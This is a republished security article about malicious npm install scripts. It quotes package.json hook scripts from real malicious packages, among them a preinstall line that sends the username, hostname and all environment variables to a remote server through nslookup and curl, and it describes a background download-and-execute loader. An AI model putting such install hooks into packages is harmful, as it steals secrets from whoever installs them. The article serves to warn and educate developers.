Security Risks of npm install Scripts and Malicious Packages
The article explains how npm install and preinstall scripts can be abused by malicious packages to execute unwanted commands, steal personal data, and launch attacks, and it provides several real‑world examples while recommending cautious use and strict permission controls.
Everyone knows that npm packages allow hook scripts such as preinstall and postinstall to run custom commands during installation, but the official npm best‑practice warns against using install scripts unless they are strictly needed for compilation, because they pose significant security risks.
The risk is that a malicious package can embed a preinstall script that runs arbitrary commands on the user’s machine, potentially opening URLs, installing software, or exfiltrating data without the user’s knowledge.
Example 1 – ember-data-react : its preinstall script runs xdg-open 'https://www.youtube.com/watch?v=dQw4w9WgXcQ', opening a rick‑roll page on Linux systems.
{
"scripts": {
"open": "xdg-open 'https://www.youtube.com/watch?v=dQw4w9WgXcQ'",
"preinstall": "npm run open",
"test": "npm run open"
}
}Example 2 – inferium : its preinstall script launches 20 Firefox tabs playing two YouTube videos repeatedly.
{
"scripts": {
"preinstall": "for i in {1..10}; do firefox https://www.youtube.com/watch?v=48rz8udZBmQ & firefox https://www.youtube.com/watch?v=FavUpD_IjVY & done &"
}
}Example 3 – micro-username : its install script uses curl to send the current user name, working directory, and hostname to a remote server, exposing personal information.
Example 4 – @primeo/address : the preinstall script performs four actions: two nslookup queries for the user and host name, a curl POST of package.json, and a curl POST of the environment variables saved in /tmp/.env, effectively leaking the entire environment.
{
"scripts": {
"preinstall": "nslookup $(whoami).u.pkgio.com ; nslookup $(uname --nodename).h.pkgio.com ; curl -X POST -d @package.json -H 'X-BOT: nope' https://www.pkgio.com/.x773/package.json ; env > /tmp/.env ; curl -X POST -d @/tmp/.env -H 'X-BOT: nope' https://www.pkgio.com/.x773/env.json"
}
}Example 5 – node-hsf : disguises itself as an Alibaba open‑source library, then uses nohup to download and execute a remote script in the background, making the malicious behavior hard to detect.
These examples demonstrate that npm install scripts can be weaponized to open unwanted webpages, flood browsers with tabs, and silently steal system information or environment data. The article concludes by urging developers to use install scripts only when absolutely necessary, to limit their permissions, keep dependencies up‑to‑date, and prefer well‑vetted packages.
Reference: https://blog.sandworm.dev/the-npm-packages-that-troll-you
Signed-in readers can open the original source through BestHub's protected redirect.
This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactand we will review it promptly.
IT Services Circle
Delivering cutting-edge internet insights and practical learning resources. We're a passionate and principled IT media platform.
How this landed with the community
Was this worth your time?
0 Comments
Thoughtful readers leave field notes, pushback, and hard-won operational detail here.